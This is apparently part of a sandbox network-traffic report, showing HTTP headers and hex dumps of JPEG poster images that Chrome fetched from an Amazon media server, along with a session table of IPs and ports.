                                                                                                                                                                                          X-Amz-IR-Id: 28776c6a-6d59-43db-bda2-2fa077f4919c
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Tue, 03 Oct 2017 15:22:37 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Thu, 03 Nov 2044 23:55:54 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Age: 2324366
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:37:59 GMT
                                                                                                                                                                                          X-Served-By: cache-iad-kcgs7200175-IAD, cache-nyc-kteb1890044-NYC
                                                                                                                                                                                          X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:37:59 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 d3 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 34 00 00 01 04 03 01 01 00 00 00 00 00 00 00 00 00 00 05 04 06 07 08 00 02 03 01 09 01 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 b8 9b 85 d7 8e 8e 60 2f 75 0e e0 2d 83 7e
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"4`/u-~
                                                                                                                                                                                          2024-12-15 11:37:59 UTC1378INData Raw: b0 f2 66 d6 28 8e 9f 5a 5c c3 4d cb 47 da a1 03 12 ce 99 30 5d 3d 8a e6 b2 86 49 9e ac 67 a4 9f e2 34 8d 92 f2 80 fa 6f 94 d0 3d 4d f3 9b 6f 23 71 0f ce c5 66 c3 26 d4 c3 12 88 7d 73 76 ce 10 9c d3 7c ec aa 5d 75 ea 36 b4 4d a0 f5 60 b6 db 67 17 d3 af 15 16 fa 08 7a 58 5b 71 ab 3c de c5 db f1 f6 55 6a 90 aa b0 c9 56 ea eb 92 bb 0e 53 44 bb 0f d1 0e f5 09 b0 7b 70 5b 87 30 6a 88 55 c9 2a 59 49 6a 2b 49 49 6a 1b 84 a7 f9 36 78 ab 84 02 74 41 5b 07 59 ec df a3 e7 31 68 6d f7 ab fc fd 4d e1 85 9a 73 a8 51 c5 e4 9e bc 64 d8 56 72 8c fb f9 62 49 a2 b2 b9 38 77 b0 bb 40 1d 71 d6 c0 ab af 1d d6 c4 ab ae 4a 0b 20 a6 b9 77 8b 21 95 c3 a9 64 37 ad 7a 55 9a de b2 62 5a 6c a5 53 83 33 12 78 2b 69 66 81 75 09 b3 65 cf 17 51 76 b2 d2 03 af 1e 93 92 58 6f bd 96 6a e3 52
                                                                                                                                                                                          Data Ascii: f(Z\MG0]=Ig4o=Mo#qf&}sv|]u6M`gzX[q<UjVSD{p[0jU*YIj+IIj6xtA[Y1hmMsQdVrbI8w@qJ w!d7zUbZlS3x+ifueQvXojR
                                                                                                                                                                                          2024-12-15 11:37:59 UTC1378INData Raw: 01 4a 85 7b 71 42 17 4c 39 d4 35 f5 3c 00 ec b5 27 13 92 fe 3c 4e 7b 28 e1 44 5d 0d 47 7e 41 1b 6e 10 b6 ab e5 e9 14 42 e4 19 92 8e d4 9e 1b 16 0f 82 c4 fc f0 eb e7 3f 4f 12 ab f0 e0 88 9e 0d c3 bd b2 ce 3b ef e1 c7 b6 64 28 d9 2f ab ba 94 9e 8a fa 8f d4 2f 13 c8 3e 91 fe 48 19 4a f0 42 78 26 61 ac e7 8e be e6 19 99 87 b9 98 69 be 61 9a 66 1e e6 61 ef b9 86 66 61 99 98 7b 99 89 e6 66 2e 66 61 99 98 66 66 1e e6 62 67 99 87 9e e6 4b e6 99 86 da 66 2f ff c4 00 31 10 00 01 03 03 02 05 02 06 03 00 03 01 01 00 00 00 02 00 01 03 04 11 12 05 13 10 14 15 21 31 16 41 06 20 22 32 33 34 23 42 51 24 30 50 40 52 ff da 00 08 01 01 00 01 08 02 ff 00 c6 9f b4 66 b6 05 6c 0a e5 c5 72 e2 b9 71 5b 02 b6 05 72 e2 b9 71 5c b8 ad 86 5b 2c b6 05 6c 0a d8 15 b0 2b 60 56 c0 ae 5c
                                                                                                                                                                                          Data Ascii: J{qBL95<'<N{(D]G~AnB?O;d(//>HJBx&aiafafa{f.faffbgKf/1!1A "234#BQ$0P@Rflrq[rq\[,l+`V\
                                                                                                                                                                                          2024-12-15 11:37:59 UTC1378INData Raw: 2e 5f 28 e8 27 4f 41 53 ec fa 75 51 79 e9 55 48 b4 4a a7 4d a2 55 21 d1 ea 59 53 44 f1 b8 33 aa 8f b0 bf f1 0b f2 07 0a a7 c6 29 1d 75 66 5d 59 97 56 5d 59 97 56 5d 59 75 65 d5 57 55 5d 55 75 54 1a 9e 44 22 9a b7 f9 70 47 a9 10 e6 9f 51 b5 90 ea 4e f6 bd 3d 7b cc 42 2e 7a 8b 8a e7 ce f8 89 6a 32 08 c8 48 b5 02 67 52 d6 18 3c d6 2a e7 c5 ac 35 a4 43 29 2e a1 22 ea 12 ae a1 2a e7 e5 5c fc cb 9e 99 73 d3 2e 7a 75 ce ce b9 da 85 ce d4 2a 79 a5 92 56 dc 55 1f 61 7f e2 17 e4 0e 15 4f 68 cd df a9 d3 ae a9 4e ba b5 32 ea 74 eb aa 53 ae a9 4c ba a5 32 ea b4 cb aa d3 2e ab 4c ba a5 3a 6d 42 17 5c d0 27 d4 60 64 35 f1 17 87 d4 e0 6f 3d 56 9d 36 a3 0b a7 af 89 97 52 85 73 f0 ae a3 0a ea 30 ae a3 12 ea 11 2e a1 12 ea 11 2e 7e 25 d4 a1 5d 56 04 da 8c 4f e3 a8 44 c9 b5
                                                                                                                                                                                          Data Ascii: ._('OASuQyUHJMU!YSD3)uf]YV]YV]YueWU]UuTD"pGQN={B.zj2HgR<*5C)."*\s.zu*yVUaOhN2tSL2.L:mB\'`d5o=V6Rs0..~%]VOD
                                                                                                                                                                                          2024-12-15 11:37:59 UTC1378INData Raw: 2f 4e 8a f4 e0 2f 4e 02 8b 44 18 da ca 5f 87 c2 47 ba f4 e4 6b d3 91 af 4e 44 bd 37 12 f4 d4 4b d3 30 af 4c 40 bd 33 02 f4 cc 0b d3 70 2f 4e 40 bd 39 4e bd 37 4e bd 37 02 f4 dd 3a f4 e5 3a a3 d3 22 a2 96 f1 a9 fe d6 55 3a c5 35 31 bc 72 7a 82 91 7a 86 8d 1e b7 4c 22 04 f4 75 f1 56 64 f1 56 6a 11 51 e3 bb 06 ad 04 e3 21 07 a8 69 17 a8 e8 d5 26 b1 4f 56 78 46 aa 75 98 29 8d e3 3a 4a a0 aa 0d c0 ac d5 a1 a3 3c 24 a4 ae 8e ac 08 c2 6d 7e 92 24 df 13 53 3a a5 d4 20 ab ed 1f a9 a9 57 a9 29 57 a9 e9 78 55 d7 43 49 6d d1 f8 82 23 fb 22 f8 8a 94 de cf 5b aa c5 47 b7 97 a9 e9 99 07 c4 b4 a4 a0 aa 8e 70 dc 09 fe 21 a5 89 7a 92 36 ee 54 ba bd 3d 53 b0 8c bf 11 c1 19 10 3f a9 e9 d7 a9 61 41 26 ee c9 f0 9f c3 22 82 32 7b be b4 2c 35 73 33 68 30 81 52 85 fe 25 16 19 21
                                                                                                                                                                                          Data Ascii: /N/ND_GkND7K0L@3p/N@9N7N7::"U:51rzzL"uVdVjQ!i&OVxFu):J<$m~$S: W)WxUCIm#"[Gp!z6T=S?aA&"2{,5s3h0R%!
                                                                                                                                                                                          2024-12-15 11:37:59 UTC1378INData Raw: 2b 1b b2 69 d0 54 bf b4 95 19 79 a3 a9 66 c8 13 55 46 39 09 cb 5b bf 8b 46 53 65 dc 8c b2 7e df 0f 7e cf 0d 5f b5 31 a0 fb 99 5b bb 32 6f b9 d4 8e bc 32 c9 07 dd 67 76 b1 3b 70 7f 74 63 f2 5d 5d 64 b3 59 2b ab f1 bf cd 74 ec 8c dc df bc 16 06 ba 30 b3 76 b2 f8 7d ad 51 c2 ae 21 94 30 2e 52 8f 74 e2 12 8a 8d 88 99 e3 d3 e9 0c 37 98 63 d3 e4 03 35 4d 41 45 52 c4 e2 f4 d4 1b cf 0b 90 d0 36 ec 86 f4 d4 99 0e e9 35 00 0c a4 a2 a5 a3 92 4d b5 3d 1d 1c 27 14 65 53 41 43 4e f1 31 6d e9 ad b8 ca a2 96 86 9d e2 63 a6 d3 28 a7 6b b1 d2 e9 f0 91 0c bc bd 17 d0 29 e0 a1 17 90 4e 5a 7a 18 a9 da a5 ca 82 95 b2 b6 dd 03 c7 14 82 7c 88 49 24 6b a7 d2 6d ee 28 f9 13 02 34 4f 42 25 18 a2 1a 30 68 c8 8e 3a 41 29 99 a9 86 92 a7 0c 42 a6 88 c7 24 54 14 c0 0e 4a 2e 58 c8 05 c4
                                                                                                                                                                                          Data Ascii: +iTyfUF9[FSe~~_1[2o2gv;ptc]]dY+t0v}Q!0.Rt7c5MAER65M='eSACN1mc(k)NZz|I$km(4OB%0h:A)B$TJ.X
                                                                                                                                                                                          2024-12-15 11:37:59 UTC1378INData Raw: 49 ea 3e 0d a9 7d cb 4f 18 b6 4a 44 e4 43 fc 23 a3 74 a6 6e b4 2d 7f ee 69 8b b5 f7 a5 da c6 93 36 e2 6d 44 d4 d2 8b d3 92 12 4d 8e 11 fb 4d 34 ab a5 d4 c5 48 7d 5c 90 ba df ec 7a b8 31 f5 11 42 d7 42 77 dd b3 31 eb c2 3f eb 76 23 9d 0f a8 7f 4e db e6 57 09 34 de a3 92 a2 29 e2 8d 09 d2 66 eb 14 ff 00 aa 5a 62 96 95 1b ba 6b e3 7e 16 79 28 7a d7 f1 2d 18 be 4f 18 7a 5c 50 f4 78 a1 42 51 7c 73 5c ed 5f 27 57 a0 d2 8c 8c 48 ff 00 94 43 57 04 79 47 90 cf 2d 9e 6b 3c d9 1e 6c 8f 32 47 b0 9a 3d 8c cf 61 33 ce 99 e7 cc f3 e6 7b 09 9e c6 66 a7 57 3d 54 94 9c 53 31 49 25 da d1 68 b2 cb 2c be d6 5f 6b 2c b2 cb 2c 65 37 f1 ca 23 a1 a2 e3 72 f1 fa 63 c7 e9 4f 1b a5 1f 4f d3 8f 43 a6 16 97 4c 3d 1d 05 f3 87 4c 61 d3 1b 7d 39 87 4e 61 d3 98 74 c6 3d 30 bc 5f b9 b8 65
                                                                                                                                                                                          Data Ascii: I>}OJDC#tn-i6mDMM4H}\z1BBw1?v#NW4)fZbk~y(z-Oz\PxBQ|s\_'WHCWyG-k<l2G=a3{fW=TS1I%h,_k,,e7#rcOOCL=La}9Nat=0_e
                                                                                                                                                                                          2024-12-15 11:37:59 UTC1378INData Raw: ca 6c b8 98 98 a4 64 66 6a b3 50 75 a2 b9 dc c0 75 22 f8 cf ec 6c bf 64 3e 4a 6b c3 31 12 2c 58 72 1d 58 c7 97 5d b3 50 c5 b1 c4 b3 46 62 9f 6b 76 6a c8 9a b4 8a 7c 31 3f 05 cc 84 9c bc 2a 7d 03 97 ef 8f e9 34 6f 76 ba 2a 28 7d 05 09 72 ff 00 48 a7 fe 2b f4 12 a4 c6 cb f6 c9 8a 66 42 77 91 37 79 32 9a f0 c4 7c f6 52 b7 92 1d 67 c3 8f 50 c5 d4 fd ee 50 ba 94 56 9c 67 16 89 ab 36 9e 05 9a 14 87 e2 3e 1c be a3 57 ed b2 9f 0c 43 39 11 24 47 a9 9c 4d f5 f9 df 23 7a 87 d5 b1 ca ef bd 86 8c 51 61 a3 26 b8 d4 91 9c 8c a4 67 23 39 17 7f 86 ff 00 f1 6d e8 b7 ae ff 00 92 ff 00 82 c5 8b 16 2d e9 b7 65 fd 34 7f ff c4 00 41 10 00 01 02 02 05 09 06 03 05 08 03 01 01 00 00 00 01 00 02 11 21 03 12 31 41 51 10 61 71 81 91 92 a1 b1 d1 20 22 52 c1 e1 f0 32 42 a2 13 30 40 53
                                                                                                                                                                                          Data Ascii: ldfjPuu"ld>Jk1,XrX]PFbkvj|1?*}4ov*(}rH+fBw7y2|RgPPVg6>WC9$GM#zQa&g#9m-e4A!1AQaq "R2B0@S
                                                                                                                                                                                          2024-12-15 11:37:59 UTC1378INData Raw: e0 5b 19 80 da d3 d7 09 69 4c f8 61 0f d4 0e ae 0a 8b 9f 45 45 cf a2 a2 e7 d1 51 73 54 5c 0a a2 e0 55 17 02 a8 b8 15 45 c0 aa 2e 05 51 7d 25 32 af 75 d7 43 0f e0 d8 3b cb 25 c1 52 05 48 a9 02 a4 0a 93 9a a4 e0 55 27 02 9f c0 a7 f0 3d 13 f8 1e 89 fc 0f 44 ee 05 47 61 4e 3b 8e e8 89 dc 77 44 ef a5 dd 13 fe 93 d1 1f a4 a8 ee 94 4e e9 47 81 47 81 47 81 51 dd 2a 3b 0a e4 a3 b1 47 62 3c 11 e0 8e 43 92 3b 14 64 d7 5a 34 64 fc b7 f2 ec 00 ea bf a6 b3 a0 9a d3 ef 52 68 f7 ad 0e d7 45 cd 47 6a 6a 07 66 41 c1 0c 83 21 45 1d 8a 3b 7e e7 c0 79 8c 9f 96 fe 59 06 51 07 7e 70 b7 fa b1 56 1b 1c 2c 76 50 a1 b5 3b 82 8f 24 c8 fb d4 80 6f bd 6a 97 50 54 7a dd 3e 09 d1 cd 76 cb 32 3a 19 ad 1b 15 1e b6 cb 82 a5 9e 06 df 24 01 4c 87 bc d1 4d 3b 62 a2 34 84 e1 90 7d c7 80 f3 19
                                                                                                                                                                                          Data Ascii: [iLaEEQsT\UE.Q}%2uC;%RHU'=DGaN;wDNGGGQ*;Gb<C;dZ4dRhEGjjfA!E;~yYQ~pV,vP;$ojPTz>v2:$LM;b4}
                                                                                                                                                                                          2024-12-15 11:37:59 UTC1378INData Raw: f5 7a 26 71 f4 4c e2 a8 e3 fd 5e 8a 8b ea f4 4c 1b de 89 9c 7d 13 06 f7 a2 60 db e8 a8 c6 d5 46 36 aa 31 b5 30 6d 54 63 6a a3 1b 55 1b 76 95 46 dd a5 51 b7 69 54 6d e2 50 02 ab 5d 66 ac 9f a7 98 c8 21 0d 2b cf cd 58 e5 69 97 5f b9 d8 b6 65 13 52 18 7e 02 db 06 be 81 5d 44 79 b7 26 6e 61 7f a5 60 e3 92 f5 9f ee 2d fc 3f e5 f9 8c 9f a7 98 59 ff 00 81 db 51 d1 da d8 64 fd 3c c2 b8 f3 c9 6f f0 1b e8 dd cc 64 fd 3c c7 dd 5b f7 74 72 c6 c5 44 75 77 b9 7d ec 9a db 4a f0 1f 2c 9f a7 98 c9 8a ce b0 5e e1 35 7f df 0e ed c3 1c ac 0e d2 14 59 f5 0e a8 57 d1 d1 08 1c f2 fb 9f dd 51 42 56 56 37 7b b9 78 1d e4 4e 4f d3 cc 2c 0f 66 e8 1f b9 1d 89 44 ab 07 68 44 60 66 a2 cd 13 1b 17 7c 66 b7 62 10 d3 d9 bd 58 de 25 5d 46 ee 63 27 e8 fe e0 b3 e5 b9 5c 15 ff 00 87 11 d2 a2
                                                                                                                                                                                          Data Ascii: z&qL^L}`F610mTcjUvFQiTmP]f!+Xi_eR~]Dy&na`-?YQd<od<[trDuw}J,^5YWQBVV7{xNO,fDhD`f|fbX%]Fc'\


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          38192.168.2.1649756151.101.193.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:37:58 UTC676OUTGET /images/M/MV5BNGM0ZTU3NmItZmRmMy00YWNjLWEzMWItYzg3MzcwZmM5NjdiXkEyXkFqcGdeQXVyNDYyMDk5MTU@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                          Referer: https://fsharetv.co/
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:37:59 UTC615INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 43060
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: 1e4f1a16-4ade-4f26-b5be-fb2aaac804dd
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Tue, 26 Jul 2016 13:28:43 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Tue, 08 Mar 2044 15:03:59 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Age: 2830052
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:37:59 GMT
                                                                                                                                                                                          X-Served-By: cache-iad-kjyo7100123-IAD, cache-ewr-kewr1740074-EWR
                                                                                                                                                                                          X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:37:59 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 9c 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 35 00 00 02 02 03 01 01 01 00 00 00 00 00 00 00 00 00 05 06 04 07 02 03 08 01 00 09 01 00 02 03 01 01 00 00 00 00 00 00 00 00 00 00 00 02 03 00 01 04 05 06 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 e3 fc 73 bf 45 fc ff 00 8f 47 4c a7 f3
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"5sEGL
                                                                                                                                                                                          2024-12-15 11:37:59 UTC1378INData Raw: 81 90 d4 7a 5d 4e 15 a9 95 14 1d 63 8f 83 65 31 05 5b 3c ae 2a 19 14 1c 98 9c f3 a0 89 28 34 a7 40 71 66 ae 39 52 b2 de 6e 02 01 da 89 62 a4 91 d7 f5 60 6a c3 42 8d da ad 72 3d 8a 56 72 62 f3 c7 57 72 25 6b 31 2c 03 b8 75 ea 5b b6 a8 2f 65 77 b0 ab ea 99 98 a3 47 d5 61 ca 34 a5 d3 4b 6c e4 65 d2 9c d7 d0 6a ec b3 87 dc 2b 27 a8 1c 7c 1b 28 30 1e a6 41 b5 4c 18 cb 4d 2c 42 dc 3c 23 7c f6 7b 8a 93 4d 67 1a ae f9 78 c3 74 fe 8b d4 b6 35 56 be 55 a6 e1 5f 31 2e b6 71 47 58 d3 ad d5 43 f5 ff 00 12 ba 5f 47 b9 4e d1 5a 97 c8 7e e7 99 36 96 7d 54 5a b5 86 8b be 58 96 30 57 50 b1 d3 e9 f6 65 ef 7a 89 37 c2 1e 40 a8 6e 8a 63 5f 0f 67 41 f3 e7 4b 2b af bb 29 b1 b2 fa 45 bd 5e ca 5e 82 0a 5e a7 b7 98 dc 4a b2 98 dc 1d 09 60 56 63 2b 98 ef c9 84 5d 49 89 24 d8 f0 cb
                                                                                                                                                                                          Data Ascii: z]Nce1[<*(4@qf9Rnb`jBr=VrbWr%k1,u[/ewGa4Klej+'|(0ALM,B<#|{Mgxt5VU_1.qGXC_GNZ~6}TZX0WPez7@nc_gAK+)E^^^J`Vc+]I$
                                                                                                                                                                                          2024-12-15 11:37:59 UTC1378INData Raw: 0f 7b 81 ab 04 cd ad d5 84 b3 b0 0d 1a 91 2e 7c 76 78 2a 83 ac 1f 21 2d 4e d1 b2 04 a1 2d b9 0e a4 5c 1d e3 16 75 e8 ad 6b 96 1b 19 d7 1b 83 54 6d 79 e4 2f 17 aa 4a f9 e3 2b a4 66 92 44 8b 2a bc b4 b3 76 a2 28 b6 ad 06 ba eb c9 19 ef f1 d8 fb b3 29 0d 7c 13 c1 79 ad 42 be ba 60 d6 0f e8 4c 00 7e f2 03 66 2a f9 53 8a cd 5f ca c1 9b 58 0d 94 52 66 8b c6 c1 93 35 9c c5 a5 a5 2e e1 23 32 e6 3e da ca c8 05 8d 19 7d eb d8 48 cf 0c 2e c9 5f 61 b3 c2 46 0c cb 3e 0e 86 41 23 fe a2 d7 ee 58 33 17 ff c4 00 33 10 00 02 02 02 01 03 03 04 01 03 04 01 05 01 00 00 01 02 00 03 04 11 12 05 13 21 10 22 31 14 23 32 33 41 15 20 42 06 24 34 51 16 30 40 43 61 71 52 ff da 00 08 01 01 00 01 08 02 9b 9b 9b 9b 9b ff 00 df 9f 5a fa 3a 15 05 bf a3 d3 3f a2 d2 67 f4 3a 67 f4 2a 67 f4
                                                                                                                                                                                          Data Ascii: {.|vx*!-N-\ukTmy/J+fD*v()|yB`L~f*S_XRf5.#2>}H._aF>A#X33!"1#23A B$4Q0@CaqRZ:?g:g*g
                                                                                                                                                                                          2024-12-15 11:37:59 UTC1378INData Raw: 60 bc 73 b6 f2 0e 89 8d 69 60 44 b1 c7 0f 1b d6 a6 2d 8b 94 a0 11 76 ac 75 a4 61 f2 b1 f7 93 81 5f 93 2b ae b2 18 a7 6c 6c 18 e3 46 15 d4 d6 ce a6 b5 e6 39 9a 9d 43 f3 1e b5 1f 62 7a 34 ce 3a c7 b6 74 53 ee b0 4e b3 fb 44 2e 0e 27 8c 01 f7 96 64 0d d7 64 e9 7f b0 cd fa 59 ff 00 72 86 d2 f9 04 35 bb 96 0f bb a9 5f 91 74 be b2 da 01 7c f6 80 ce 45 17 10 99 55 ad 6a a0 59 89 c1 15 a5 54 35 cd c1 71 ed b6 80 13 26 db 4d b5 94 2f 72 52 aa 90 82 fe f8 5c ab 4d fd 40 f6 83 c4 0d ff 00 8e a6 b5 15 8c 3f 30 0d 4e a4 34 e3 d6 83 ba eb f4 61 2f c6 fa 95 e0 46 15 58 44 59 2f a2 9b d8 bb 53 65 34 af 08 dd 30 54 fb 57 4e e8 35 0a b0 3b 07 9c 5b 03 fc 1c 8a d3 60 9b 50 a7 38 2d ae c5 f6 50 ba 05 c8 4d b6 e6 18 52 6f e5 7e 85 64 8c 4a 4d 75 f3 19 36 87 7e ea a8 07 e7 83
                                                                                                                                                                                          Data Ascii: `si`D-vua_+llF9Cbz4:tSND.'ddYr5_t|EUjYT5q&M/rR\M@?0N4a/FXDY/Se40TWN5;[`P8-PMRo~dJMu6~
                                                                                                                                                                                          2024-12-15 11:37:59 UTC1378INData Raw: 31 9f 67 1f 39 ba 9b f0 9d 57 13 ed 19 d2 6f 29 51 31 ac 67 b4 d7 2a a1 d5 5b 67 37 1f 1e a2 6b ad 6e e6 39 7d 4f 3c a7 28 73 ce 4b 32 c7 e5 b2 47 7d a9 63 ab 29 36 6c 4b 19 9a a0 81 ed e6 b3 97 b7 50 4e bd fb d7 d0 c0 3d 8b 04 f9 9b 8d e7 cc 66 df 89 5a a7 33 ce b0 4e f5 6b f9 f3 8a 79 d9 58 7f e9 e9 71 f7 1e 96 c7 f5 e3 a5 78 81 50 67 e4 8c 0a 0b 85 4d 83 cb 07 a5 b6 53 c6 c0 d6 71 41 96 9c dd 54 bf 44 56 2b 2a c3 4a 4b 5a fd 75 d5 e9 d8 e9 57 7b ec 0b 93 42 5a 16 e7 18 29 f3 2a 45 36 79 c8 3f c4 6a 57 9f db ed 58 9f b3 c7 04 d2 22 5b 69 55 a5 dd 72 45 72 b2 48 f2 a3 f2 9b f1 37 3a ef ee 5f 43 17 f5 2c 3e 35 37 a8 53 94 14 95 dc fa 76 f9 88 da 24 94 6e 2a 56 70 4e 2a 5e b0 cb 6d 61 4a be 62 bb 1c 2e a1 45 43 8a ba d3 59 7c a6 cf ce 6c db b9 94 d9 e2 26
                                                                                                                                                                                          Data Ascii: 1g9Wo)Q1g*[g7kn9}O<(sK2G}c)6lKPN=fZ3NkyXqxPgMSqATDV+*JKZuW{BZ)*E6y?jWX"[iUrErH7:_C,>57Sv$n*VpN*^maJb.ECY|l&
                                                                                                                                                                                          2024-12-15 11:37:59 UTC1378INData Raw: 6a 1e c1 35 e0 43 e2 37 dd 6d 41 ec 03 d0 0d c5 ed d2 06 bb 4d e3 76 20 f8 1f 49 76 df 58 56 f1 ee c7 5b 6e 05 e5 35 be 1d a5 6c aa d3 62 58 59 8f 05 a6 e6 cb cc 7c 6c 8c 56 b6 e4 3c d7 5c 09 12 d4 34 d9 b9 9b 7f d4 1e 75 91 69 98 3d 65 e8 e2 af 8f 7d 36 71 ec 8d e3 2e 96 9f f7 26 db ad e7 c1 eb 33 23 17 ed f8 ee 59 91 a5 8a 34 26 77 ec 9f 97 ce 22 12 4b 44 5e 03 5e 9d 77 f7 2f ad 7f 0b 0b 78 f4 a3 e0 cb 6c fc 76 cc bf 30 32 e8 70 ee 6c cc 3c 8a 98 71 b2 f2 f5 bb 21 b2 de ca 24 5d 2b 72 7c 17 aa dd cc d5 fa 5e 55 4e 9d 7b 14 b2 85 4f 68 02 7f a8 71 91 28 42 3a 4f 55 04 25 77 7d 42 fc 01 e6 75 0c 03 9a 00 99 dd 29 f1 57 98 c5 e8 89 7d 61 e6 16 13 57 75 6e 80 35 c7 df ec af 4a 3a b5 2b 49 a4 a6 46 72 a9 0a ad ac 6b 57 81 be aa cf 13 75 dd f6 2d 14 17 21 45
                                                                                                                                                                                          Data Ascii: j5C7mAMv IvXV[n5lbXY|lV<\4ui=e}6q.&3#Y4&w"KD^^w/xlv02pl<q!$]+r|^UN{Ohq(B:OU%w}Bu)W}aWun5J:+IFrkWu-!E
                                                                                                                                                                                          2024-12-15 11:37:59 UTC1378INData Raw: da f6 9a a7 0f 2a 67 3e d7 25 8c 54 f2 13 20 ec 89 bd 79 8f ee e4 ab cf 7c a3 7e d3 be 51 fc 59 e7 63 72 d2 cd 5c ac 6d 86 fb 0b 3b 6b ed d7 69 25 e8 17 5a 40 09 f2 6a ae 76 eb 9c 77 cb 4b 60 1a 8c 54 ce e2 8f 30 3a af 82 c4 73 a8 ce ea 2c f1 e0 42 35 ea 94 ef c9 ec 8d ce d0 8f 5f 1f 40 11 bc 03 50 02 76 44 6a 95 7e 4e bf 85 52 df 1d 87 9d 86 8e 9c 7c 11 3b 53 b4 23 20 1f db 4d 61 95 c9 7c 74 5e 73 b2 83 91 87 19 3c 4e 28 51 ac 1d b4 1c 49 6a 14 69 63 52 88 1a 53 ae 4b b1 5a ce 08 93 37 88 d6 bf b1 2f 3e 14 73 b2 06 7f 31 ed 2f e8 a7 89 dc 37 ee 7d 44 ee 35 83 88 ed 34 0a 57 c9 ee 24 66 53 e9 5d dc 06 a1 c9 26 77 d9 fe 1d 59 8e e7 69 a2 9e 27 c9 b0 18 ec 1a 20 2c a4 07 25 83 72 2c 5b 73 b8 e3 51 df 80 d4 19 03 4a 09 c9 de 8c 19 1f c3 54 36 c0 4e 7e 54 c0
                                                                                                                                                                                          Data Ascii: *g>%T y|~QYcr\m;ki%Z@jvwK`T0:s,B5_@PvDj~NR|;S# Ma|t^s<N(QIjicRSKZ7/>s1/7}D54W$fS]&wYi' ,%r,[sQJT6N~T
